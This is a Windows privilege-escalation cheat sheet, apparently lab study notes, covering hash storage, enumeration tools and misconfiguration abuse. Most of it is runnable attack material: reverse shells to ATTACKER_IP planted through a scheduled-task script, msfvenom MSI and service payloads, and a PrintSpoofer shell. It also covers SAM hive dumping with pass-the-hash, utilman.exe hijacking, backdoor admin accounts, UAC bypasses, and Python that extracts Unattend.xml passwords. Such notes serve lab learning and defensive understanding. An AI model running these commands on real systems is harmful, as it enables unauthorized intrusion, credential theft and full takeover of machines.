Windows Users
Types:
- Administrators: can change any system configuration parameter and access any file on the system.
- Standard Users: cannot make permanent or essential changes to the system and are limited to their own files.
Any user with administrative privileges will be part of the Administrators group. On the other hand, standard users are part of the Users group.
There are also some special built-in accounts used by the operating system that matter in the context of privilege escalation:
- SYSTEM/LocalSystem: an account used by the operating system to perform internal tasks. It has full access to all files and resources on the host, with even higher privileges than administrators.
- Local Service: default account used to run Windows services with "minimum" privileges. It presents anonymous credentials over the network.
- Network Service: default account used to run Windows services with "minimum" privileges. It uses the computer account's credentials to authenticate over the network.
Windows Password Hashes
The Windows OS stores hashed user account passwords locally in the SAM (Security Accounts Manager) database, a registry hive that holds the local user accounts and their password hashes. The SAM hive file (C:\Windows\System32\config\SAM) is held open by the kernel while the operating system is running, so it cannot simply be copied from disk; it can, however, be exported with reg save (which needs administrative rights or SeBackupPrivilege, see SeBackup/SeRestore below) or read from a volume shadow copy.
As a result, attackers typically use in-memory techniques and tools (Mimikatz, or an LSASS memory dump processed offline) to extract the SAM hashes from the LSASS process. Elevated privileges (local administrator, usually with SeDebugPrivilege) are needed to access and interact with the LSASS process.
Authentication and verification of user credentials is handled by the Local Security Authority (LSA), which runs inside the LSASS process.
Windows versions up to Windows Server 2003 store two different types of password hashes:
- LM: the original LAN Manager hashing algorithm, used by default in Windows versions before NT 4.0 and kept alongside the NT hash for backwards compatibility long afterwards.
  - The password is truncated or null-padded to 14 characters and converted to uppercase.
  - It is split into two seven-character chunks.
  - Each chunk is used as a DES key to encrypt the constant string "KGS!@#$%"; the two 8-byte ciphertexts are concatenated.
  - Consequences: case is lost, each half is cracked independently (a 7-character keyspace), and a password of seven characters or fewer leaves the second half as the well-known constant AAD3B435B51404EE, which reveals the password length.
- NT hash (often loosely called the "NTLM hash"): the hash used by the NTLM family of challenge-response authentication protocols between Windows computers.
  - It is the MD4 digest of the password encoded as UTF-16LE.
  - It does not split the password into two chunks.
  - It is case sensitive.
  - It allows symbols and Unicode characters.
  - It is still unsalted, so identical passwords produce identical hashes and the hash itself can be used directly in Pass-the-Hash attacks.
Windows disables LM hash storage by default and relies on the NT hash only from Windows Vista / Server 2008 onwards (the LM field in the SAM then holds the "empty" value AAD3B435B51404EEAAD3B435B51404EE).
Windows Privilege Escalation
Scripts And Tools
WinPEAS
WinPEAS is a script (shipped as an executable and as a batch version) that enumerates the target system to uncover privilege escalation paths.
PrivescCheck
PrivescCheck is a PowerShell script that searches common privilege escalation on the target system. It provides an alternative to WinPEAS without requiring the execution of a binary file.
To run PrivescCheck on the target system, you may need to bypass the execution policy restrictions. To achieve this, you can use the Set-ExecutionPolicy cmdlet scoped to the current process only (no registry change, nothing left behind), then dot-source the script:
Set-ExecutionPolicy Bypass -Scope Process -Force
. .\PrivescCheck.ps1
Invoke-PrivescCheck
WES-NG: Windows Exploit Suggester - Next Generation
WES-NG is a Python script that takes the output of Windows' systeminfo utility and lists the vulnerabilities the OS is affected by, including any public exploits for those vulnerabilities.
# Run systeminfo on the target machine and redirect the output to a txt file
systeminfo > systeminfo.txt
# On the attacker machine, fetch the latest definitions once, then run against the file
wes.py --update
wes.py systeminfo.txt
Windows Exploit Suggester
This tool compares a target's patch level against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins. It relies on the Microsoft security bulletin spreadsheet, which Microsoft stopped publishing in 2017, so WES-NG (above) is preferred for current systems.
# Run systeminfo on the target system and store the output to a file, then on the attacker machine:
./windows-exploit-suggester.py --update
./windows-exploit-suggester.py --database DB_FILE.xls --systeminfo SYSTEMINFO_FILE.txt
Metasploit module: post/multi/recon/local_exploit_suggester
It checks the host behind an existing Meterpreter session against Metasploit's local exploit modules and lists the ones that appear to apply.
use post/multi/recon/local_exploit_suggester
set SESSION SESSION_ID
run
Harvesting Passwords
Unattended Windows Installations
When installing Windows on a large number of hosts, administrators may use Windows Deployment Services, which allows for a single operating system image to be deployed to several hosts through the network. These kinds of installations are referred to as unattended installations as they don't require user interaction.
Such installations require an administrator account to perform the initial setup, and its credentials might end up stored on the machine in one of the following locations:
- C:\Unattend.xml
- C:\Windows\Panther\Unattend.xml
- C:\Windows\Panther\Unattend\Unattend.xml
- C:\Windows\system32\sysprep.inf
- C:\Windows\system32\sysprep\sysprep.xml
Passwords in these files may be Base64-encoded (a <PlainText>false</PlainText> element next to the <Value> element indicates this).
Decode Base64 data using PowerShell:
$password='PASS_VALUE'
$password=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($password))
echo $password
If the result looks like characters separated by NUL bytes, the value was written by Windows System Image Manager, which encodes UTF-16LE and appends the element name ("Password" or "AdministratorPassword") before Base64-encoding; decode with [System.Text.Encoding]::Unicode instead and strip that suffix.
Once the password is retrieved, Impacket's psexec.py can be used to log in to the target as that administrator.
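As an added example (not from the original notes), the following Python walks an Unattend.xml, pulls the AutoLogon, AdministratorPassword and LocalAccount passwords, and handles both encodings seen in the wild: plain Base64 of the UTF-8 password (the case the PowerShell one-liner above covers) and the UTF-16LE-plus-element-name form that Windows System Image Manager writes. The answer file is a constructed sample; the usernames and passwords in it are invented, and treating a missing <PlainText> element as plain text is an assumption.

```python
import base64
import xml.etree.ElementTree as ET


def _local(tag: str) -> str:
    """Strip the namespace: '{urn:schemas-microsoft-com:unattend}Value' -> 'Value'."""
    return tag.rsplit("}", 1)[-1]


def _child_text(elem, name):
    for child in elem:
        if _local(child.tag) == name:
            return (child.text or "").strip()
    return None


def decode_unattend_password(value: str, plaintext: bool, element_name: str = "Password") -> str:
    """Recover the clear-text password from a <Value> element.
    Hand-written answer files usually hold Base64(UTF-8 password); files produced by
    Windows System Image Manager with 'Hide sensitive data' hold
    Base64(UTF-16LE(password + element_name)), e.g. '...Password'."""
    if plaintext:
        return value
    raw = base64.b64decode(value)
    # UTF-16LE text of a Latin-script password has a NUL in every odd byte position.
    if raw and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        text = raw.decode("utf-16-le")
        if text.endswith(element_name):
            text = text[: -len(element_name)]
        return text
    return raw.decode("utf-8", errors="replace")


def _password_from(pw_elem, element_name):
    value = _child_text(pw_elem, "Value")
    if value is None:
        return None
    # Assumption: a missing <PlainText> element means the value is plain text.
    plaintext = (_child_text(pw_elem, "PlainText") or "true").lower() == "true"
    return decode_unattend_password(value, plaintext, element_name)


def extract_unattend_credentials(xml_text: str):
    """Return (username, password, source_element) triples found in an answer file."""
    found = []
    for elem in ET.fromstring(xml_text).iter():
        tag = _local(elem.tag)
        if tag == "AutoLogon":
            for child in elem:
                if _local(child.tag) == "Password":
                    pw = _password_from(child, "Password")
                    if pw is not None:
                        found.append((_child_text(elem, "Username"), pw, tag))
        elif tag == "AdministratorPassword":
            pw = _password_from(elem, "AdministratorPassword")
            if pw is not None:
                found.append(("Administrator", pw, tag))
        elif tag == "LocalAccount":
            for child in elem:
                if _local(child.tag) == "Password":
                    pw = _password_from(child, "Password")
                    if pw is not None:
                        found.append((_child_text(elem, "Name"), pw, tag))
    return found


def _b64_utf16(text: str) -> str:
    """Encode the way WSIM does, used only to build the constructed sample below."""
    return base64.b64encode(text.encode("utf-16-le")).decode()


# Constructed sample answer file (invented accounts); mixes WSIM-style and hand-written values.
SAMPLE_UNATTEND = f"""<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup" processorArchitecture="amd64">
      <AutoLogon>
        <Password>
          <Value>{_b64_utf16("Winter2024!Password")}</Value>
          <PlainText>false</PlainText>
        </Password>
        <Enabled>true</Enabled>
        <Username>Administrator</Username>
      </AutoLogon>
      <UserAccounts>
        <AdministratorPassword>
          <Value>{_b64_utf16("Deploy#1AdministratorPassword")}</Value>
          <PlainText>false</PlainText>
        </AdministratorPassword>
        <LocalAccounts>
          <LocalAccount>
            <Password>
              <Value>U3VtbWVyMjAyNA==</Value>
              <PlainText>false</PlainText>
            </Password>
            <Name>svc_deploy</Name>
            <Group>Administrators</Group>
          </LocalAccount>
        </LocalAccounts>
      </UserAccounts>
    </component>
  </settings>
</unattend>
"""
```

Run extract_unattend_credentials on the text of any of the files listed above; each triple names the account the password belongs to, which is what you need before trying it with psexec.py.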
Powershell History
Read the PowerShell history file (PSReadline records every interactive command, including any passwords typed on a command line; each user has their own file):
# cmd
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
# ps (the exact path can be confirmed with (Get-PSReadlineOption).HistorySavePath)
type $Env:userprofile\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Saved Windows Credentials
# List saved credentials
cmdkey /list
# Use saved credentials (only works for a user that appears in the cmdkey /list output)
runas /savecred /user:admin cmd.exe
IIS Configuration
The configuration of websites on IIS is stored in web.config files, which can contain database connection strings with passwords or credentials for configured authentication mechanisms.
web.config can be found in one of the following locations:
- C:\inetpub\wwwroot\web.config
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
# Find database connection strings in the file
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr /i connectionString
Retrieve Credentials from Software: PuTTY
# PuTTY stores proxy credentials (ProxyUsername/ProxyPassword) in cleartext in each saved session
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
PowerSploit
PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment.
PowerUp.ps1
PowerUp aims to be a clearing house of common Windows privilege escalation vectors that rely on misconfigurations (service permissions, unquoted service paths, AlwaysInstallElevated, leftover unattended-setup files and so on).
Usage:
# Start PowerShell with the execution policy bypassed, dot-source the script, run all checks
powershell -ep bypass
. .\PowerUp.ps1
Invoke-PrivescAudit
Scheduled Tasks
Looking into scheduled tasks on the target system, you may find a task that either lost its binary or uses a binary you can modify. If the task runs as a privileged user, whatever you put in that binary runs with that user's privileges.
# List scheduled tasks
schtasks
# List detailed information for a task
schtasks /query /tn TASK_NAME /fo list /v
# Check the "Task To Run" and "Run As User" parameters.
# Check files permissions
icacls c:\tasks\schtask.bat
# Modify a bat file to spawn a reverse shell
echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP ATTACKER_PORT > C:\tasks\schtask.bat
# Set up the listener and wait for the scheduled task to be triggered
# Trigger a task (this is uncommon in a real scenario)
schtasks /run /tn TASK_NAME
AlwaysInstallElevated
Windows Installer files (.msi) are used to install applications on the system. They normally run with the privilege level of the user that starts them. However, the AlwaysInstallElevated policy makes Windows Installer run any package as SYSTEM, from any user account (even unprivileged ones). This allows us to generate a malicious MSI file that would run with SYSTEM privileges.
# This method requires the AlwaysInstallElevated value to be set to 1 in BOTH of these keys
C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Once both are set, generate a malicious .msi file
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=ATTACKER_PORT -f msi -o malicious.msi
# Transfer and run the installer with the command below and receive the reverse shell
msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi
Abusing Service Misconfigurations
Windows services are managed by the Service Control Manager (SCM), a process in charge of managing the state of services, checking the current status of any given service and generally providing a way to configure services.
Each service on a Windows machine has an associated executable which is run by the SCM whenever the service is started.
# Check a specific service
sc qc SERVICE_NAME
The associated executable is specified through the BINARY_PATH_NAME parameter, and the account used to run the service is shown in the SERVICE_START_NAME parameter. All service configurations are stored in the registry under HKLM\SYSTEM\CurrentControlSet\Services\.
Insecure Permissions on Service Executable
If the executable associated with a service has weak permissions that allow an attacker to modify or replace it, the attacker can gain the privileges of the service's account trivially.
Example: Splinterware System Scheduler vulnerability (the WindowsScheduler service executable is writable by every user).
sc qc WindowsScheduler
# Check permissions on the executable associated with this service
icacls C:\PROGRA~2\SYSTEM~1\WService.exe
# Generate a service payload (exe-service format, so the SCM accepts it) and replace the service executable with it
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=ATTACKER_PORT -f exe-service -o rev-svc.exe
move WService.exe WService.exe.bkp
move C:\Users\thm-unpriv\rev-svc.exe WService.exe
# Make sure the service account can read and execute the new binary
icacls WService.exe /grant Everyone:F
# Restart the service (with a listener waiting on ATTACKER_PORT)
sc stop windowsscheduler
sc start windowsscheduler
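Both the scheduled-task check and the service-executable check above come down to reading icacls output and spotting a grant of write-equivalent rights to a principal every user belongs to. The Python below is an added example, not part of the original notes: it parses icacls output for a given path into ACEs and flags the ones that let Everyone, BUILTIN\Users, Authenticated Users or INTERACTIVE (plus any principal you pass, e.g. your own account) modify the file. The two icacls outputs are constructed samples, one modelled on the vulnerable WService.exe case and one on a properly protected system binary.

```python
import re

# icacls right tokens that allow changing a file's contents or its security descriptor.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WDAC", "WO"}

# Principals that every local user is a member of (lower-cased for comparison).
LOW_PRIV_PRINCIPALS = {
    "everyone",
    r"builtin\users",
    r"nt authority\authenticated users",
    r"nt authority\interactive",
}

ACE_RE = re.compile(r"^(?P<principal>.+?):(?P<rights>(?:\([^)]*\))+)\s*$")


def parse_icacls(output: str, path: str):
    """Parse `icacls <path>` output into a list of (principal, [tokens]).
    The first line carries the path in front of the first ACE; later ACEs are
    on indented continuation lines; the trailing summary line is ignored."""
    entries = []
    for line in output.splitlines():
        line = line.strip()
        if line.lower().startswith(path.lower()):
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue  # blank line or "Successfully processed ..." summary
        tokens = []
        for group in re.findall(r"\(([^)]*)\)", m.group("rights")):
            tokens.extend(t.strip() for t in group.split(","))  # handles "(RX,W)" groups
        entries.append((m.group("principal"), tokens))
    return entries


def weak_acl_entries(output: str, path: str, extra_principals=()):
    """Return the grant ACEs that let a low-privileged principal modify the file."""
    who = LOW_PRIV_PRINCIPALS | {p.lower() for p in extra_principals}
    weak = []
    for principal, tokens in parse_icacls(output, path):
        if "DENY" in tokens or principal.lower() not in who:
            continue
        if WRITE_RIGHTS & set(tokens):
            weak.append((principal, tokens))
    return weak


# Constructed icacls output modelled on the writable WService.exe case.
ICACLS_WEAK = r"""C:\PROGRA~2\SYSTEM~1\WService.exe Everyone:(I)(F)
                                  NT AUTHORITY\SYSTEM:(I)(F)
                                  BUILTIN\Administrators:(I)(F)
                                  BUILTIN\Users:(I)(F)

Successfully processed 1 files; Failed processing 0 files
"""

# Constructed icacls output for a properly protected system binary.
ICACLS_OK = r"""C:\Windows\System32\svchost.exe NT SERVICE\TrustedInstaller:(F)
                                BUILTIN\Administrators:(RX)
                                NT AUTHORITY\SYSTEM:(RX)
                                BUILTIN\Users:(RX)

Successfully processed 1 files; Failed processing 0 files
"""
```

On a real target, feed it the output of icacls for the "Task To Run" binary of each interesting scheduled task and for each BINARY_PATH_NAME from sc qc; an empty result for a binary means this particular vector is closed, even if the task or service runs as SYSTEM.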
Unquoted Service Paths
When working with Windows services, a very particular behaviour occurs when the service is configured to point to an "unquoted" executable. By unquoted, we mean that the path of the associated executable isn't wrapped in quotes to account for spaces in the command.
Example: C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe
Instead of failing as it probably should, the SCM (via CreateProcess) tries to help the user and searches for the binaries in the following order:
- First, C:\MyPrograms\Disk.exe. If it exists, the service will run this executable.
- If that doesn't exist, C:\MyPrograms\Disk Sorter.exe. If it exists, the service will run this executable.
- If that doesn't exist either, C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe. This option is expected to succeed and will typically be run in a default installation.
If an attacker can create any of the executables that are searched for before the expected service executable, they can force the service to run an arbitrary binary. However, most service executables are installed under C:\Program Files or C:\Program Files (x86) by default, which are not writable by unprivileged users; the vector only works when a directory on the path (here C:\MyPrograms) is writable.
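To make the search order concrete, here is an added Python example (not from the original notes) that parses the output of sc qc into its fields and, for an unquoted BINARY_PATH_NAME, lists the paths that would be tried before the real executable, in order. It goes slightly beyond the page's single case by stopping at the first prefix that already ends in .exe, so a path followed by arguments (svchost.exe -k netsvcs) is not reported as hijackable. The sc qc output is a constructed sample for the example service.

```python
import re

SC_LINE_RE = re.compile(r"^\s*([A-Z_]+)\s*:\s?(.*)$")


def parse_sc_qc(output: str) -> dict:
    """Turn `sc qc <service>` output into a dict of its configuration fields."""
    config = {}
    for line in output.splitlines():
        m = SC_LINE_RE.match(line)
        if m:
            config[m.group(1)] = m.group(2).strip()
    return config


def hijack_candidates(binary_path: str):
    """Paths CreateProcess tries, in order, before the intended executable when a
    service path is unquoted and contains spaces. Empty list: not hijackable this way."""
    cmd = binary_path.strip()
    if cmd.startswith('"'):
        return []  # quoted: the exact path is used
    parts = cmd.split(" ")
    candidates = []
    for i in range(1, len(parts)):
        prefix = " ".join(parts[:i])
        if prefix.lower().endswith(".exe"):
            break  # reached the real executable; anything after it is arguments
        candidates.append(prefix + ".exe")
    return candidates


def audit_service(sc_output: str) -> dict:
    """Combine both checks: who the service runs as and which paths could be planted."""
    cfg = parse_sc_qc(sc_output)
    binary = cfg.get("BINARY_PATH_NAME", "")
    return {
        "service": cfg.get("SERVICE_NAME"),
        "runs_as": cfg.get("SERVICE_START_NAME"),
        "binary": binary,
        "plantable": hijack_candidates(binary),
    }


# Constructed `sc qc disksorter` output for the example above.
SAMPLE_SC_QC = r"""[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: disksorter
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Disk Sorter Enterprise
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""
```

To collect inputs for every service at once on the target, wmic service get name,pathname,startname prints the same three fields; the candidates that matter are those whose parent directory you can write to (check with icacls).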
Insecure Service Permissions
If the service DACL (not the service executable's DACL) allows you to modify the configuration of a service, you will be able to reconfigure it. Check the service DACL with accesschk from Sysinternals:
accesschk64.exe -qlc thmservice
If the BUILTIN\Users group has the SERVICE_ALL_ACCESS permission (or at least SERVICE_CHANGE_CONFIG), it means any user can reconfigure the service.
# Generate a reverse shell with msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=ATTACKER_PORT -f exe-service -o rev-svc3.exe
# Grant Everyone permissions so the service account can read and execute the payload
icacls C:\rev-svc3.exe /grant Everyone:F
# Change the service's associated executable and account
sc config THMService binPath= "C:\rev-svc3.exe" obj= LocalSystem
# Restart the service
sc stop THMService
sc start THMService
Abusing Unpatched Software
You can use the wmic tool to list software installed on the target system and its versions.
wmic product get name,version,vendor
Remember that the wmic product command may not return all installed programs (it only lists packages installed through Windows Installer). It is always worth checking desktop shortcuts, available services or generally any trace that indicates the existence of additional software that might be vulnerable.
Add Account To Administrators Group
net user <username> <password> /add
net localgroup administrators <username> /add
Abusing Dangerous Privileges
Check privileges with whoami /priv.
A comprehensive list of exploitable privileges can be found on the Priv2Admin GitHub project.
SeBackup/SeRestore
The SeBackup and SeRestore privileges allow users to read and write any file on the system, ignoring the DACL in place. The idea behind these privileges is to allow certain users to perform backups of a system without requiring full administrative privileges.
Having this power, an attacker can trivially escalate privileges on the system using many techniques, for example copying the SAM and SYSTEM registry hives to extract the local Administrator's password hash.
By default, the "Backup Operators" group is granted the SeBackup and SeRestore privileges.
# List privileges (a privilege shown as Disabled is still held; tools enable it when they need it)
whoami /priv
# Save the SAM and SYSTEM hives (SYSTEM holds the boot key needed to decrypt the SAM hashes)
reg save hklm\system C:\Users\THMBackup\system.hive
reg save hklm\sam C:\Users\THMBackup\sam.hive
# Copy both hives to the attacker machine and dump the hashes with Impacket
python3 /opt/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL
# Use the Administrator's hash (LMHASH:NTHASH; the LM part may be left empty) in a Pass-the-Hash attack to get a SYSTEM shell on the target
python3 /opt/impacket/examples/psexec.py -hashes ADMIN_HASH administrator@TARGET_IP
SeTakeOwnership
The SeTakeOwnership privilege allows a user to take ownership of any object on the system, including files and registry keys, opening up many possibilities for elevating privileges: we could, for example, search for a service running as SYSTEM and take ownership of the service's executable.
We'll abuse utilman.exe to escalate privileges this time. Utilman is a built-in Windows application used to provide Ease of Access options on the lock screen. Since Utilman is run with SYSTEM privileges, we will gain SYSTEM privileges if we replace the original binary with any payload we like. As we can take ownership of any file, replacing it is trivial.
takeown /f C:\Windows\System32\Utilman.exe
Notice that being the owner of a file doesn't necessarily mean that you have permissions over it, but as the owner you can assign yourself any permissions you need.
# Give the user full permissions over utilman.exe
icacls C:\Windows\System32\Utilman.exe /grant USER:F
# After this, replace utilman.exe with a copy of cmd.exe (back up the original first)
copy C:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe
Finally, lock the screen from the Start menu and click the "Ease of Access" button on the lock screen, which runs utilman.exe with SYSTEM privileges. Since it was replaced with a copy of cmd.exe, we get a command prompt with SYSTEM privileges. This last step needs a GUI (console or RDP) session.
SeImpersonate/SeAssignPrimaryToken: Token Impersonation
These privileges allow a process to impersonate other users and act on their behalf. Impersonation usually consists of being able to spawn a process or thread under the security context of another user.
As attackers, if we manage to take control of a process with SeImpersonate or SeAssignPrimaryToken privileges, we can impersonate any user connecting and authenticating to that process.
Tokens are classified by impersonation level:
- Impersonate-level tokens are created as a direct result of a non-interactive logon (a network logon, for example). They can be used to impersonate the user on the local system only, not on remote systems.
- Delegate-level tokens are created through an interactive logon. They can be used to impersonate the user on remote systems as well.
The following privileges are relevant to a successful impersonation attack:
- SeAssignPrimaryToken: allows a process to assign a token (for example one obtained through impersonation) as the primary token of a new process.
- SeCreateToken: allows a user to create an arbitrary token, including one with administrative privileges.
- SeImpersonatePrivilege: allows a process to impersonate a client after authentication, and so to create a process under the security context of another user, usually SYSTEM.
In Windows systems, the LOCAL SERVICE and NETWORK SERVICE accounts already have such privileges. Since these accounts are used to run services under restricted identities, it makes sense to allow them to impersonate connecting users if the service needs to. Internet Information Services (IIS) will also create a similar default account called iis apppool\defaultapppool for web applications.
To elevate privileges using such accounts, an attacker needs the following:
1. To spawn a process that users can connect and authenticate to, so that impersonation can occur.
2. To find a way to force a privileged user (typically SYSTEM) to connect and authenticate to the spawned malicious process. This second step is what the "potato" family of tools and PrintSpoofer automate.
Token Impersonation With Incognito
Incognito, a Meterpreter extension, can be used to list the access tokens present on the host and impersonate one of them.
The SeImpersonatePrivilege privilege is needed for the Incognito module to escalate privileges.
# Load the Incognito module inside Meterpreter
load incognito
# List user access tokens (delegation and impersonation tokens are listed separately)
list_tokens -u
# Impersonate one of the listed tokens, e.g. "NT AUTHORITY\SYSTEM"
impersonate_token "TOKEN_NAME"
# Migrate to a stable process such as explorer.exe so the new context survives
migrate EXPLORER_PID
Kernel Exploitation
Kernel exploits on Windows target vulnerabilities in the Windows kernel or in kernel-mode drivers to execute arbitrary code in kernel mode, which is then used to run privileged commands or obtain a SYSTEM shell.
Windows Kernel Exploits Repository: GitHub Repository
UAC Bypass
Bypassing UAC With UACMe
UAC (User Account Control) is used to ensure that changes to the operating system require approval from an administrator or a user account that is part of the local Administrators group; an administrator's interactive session runs with a filtered, medium-integrity token until elevation is approved.
UACMe (Akagi) is an open-source tool that bypasses Windows UAC using a catalogue of numbered methods (auto-elevating binaries, COM interfaces, DLL hijacks and similar). It contains over 60 of them, chosen according to the version of Windows running on the target.
In order to elevate privileges by bypassing UAC, you need access to a user that is a member of the local Administrators group; check the group membership with:
net localgroup administrators
UACMe usage
# Generate the meterpreter payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ATTACKER_IP LPORT=ATTACKER_PORT -f exe > shell.exe
# Set up listener
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST ATTACKER_IP
set LPORT ATTACKER_PORT
run
# Navigate to the Temp directory
cd C:\\Users\\admin\\AppData\\Local\\Temp
upload shell.exe
upload Akagi64.exe
# Bypass UAC using method 23 of Akagi (each method number is a specific technique valid for certain Windows builds; pick one that applies). It runs shell.exe with elevated privileges
Akagi64.exe 23 C:\Users\admin\AppData\Local\Temp\shell.exe
# In the new elevated session, migrate to a process running as NT AUTHORITY\SYSTEM (migrate PID) or run getsystem
Bypassing UAC With Metasploit
UAC is a Windows security feature that prevents unauthorized changes from being made to the operating system without approval.
The "Windows Escalate UAC Protection Bypass (In Memory Injection)" module (exploit/windows/local/bypassuac_injection) bypasses UAC by abusing the trusted-publisher auto-elevation mechanism through process injection. It requires an existing 64-bit Meterpreter session running as a member of the local Administrators group.
Once a 64-bit Meterpreter session is established:
use exploit/windows/local/bypassuac_injection
set payload windows/x64/meterpreter/reverse_tcp
set SESSION SESSION_ID
set LPORT ATTACKER_PORT
set TARGET "Windows x64"
run
Once the module has run successfully, the new session carries an elevated token and privileges can be escalated to SYSTEM with the getsystem command.
PrintSpoofer
PrintSpoofer: From LOCAL/NETWORK SERVICE to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 and Server 2016/2019.
# Spawn an interactive SYSTEM cmd in the current console (-i interactive, -c command)
PrintSpoofer.exe -i -c cmd
# Or run a command non-interactively as SYSTEM, e.g. a reverse shell back to a listener
PrintSpoofer.exe -c "C:\TOOLS\nc.exe ATTACKER_IP ATTACKER_PORT -e cmd"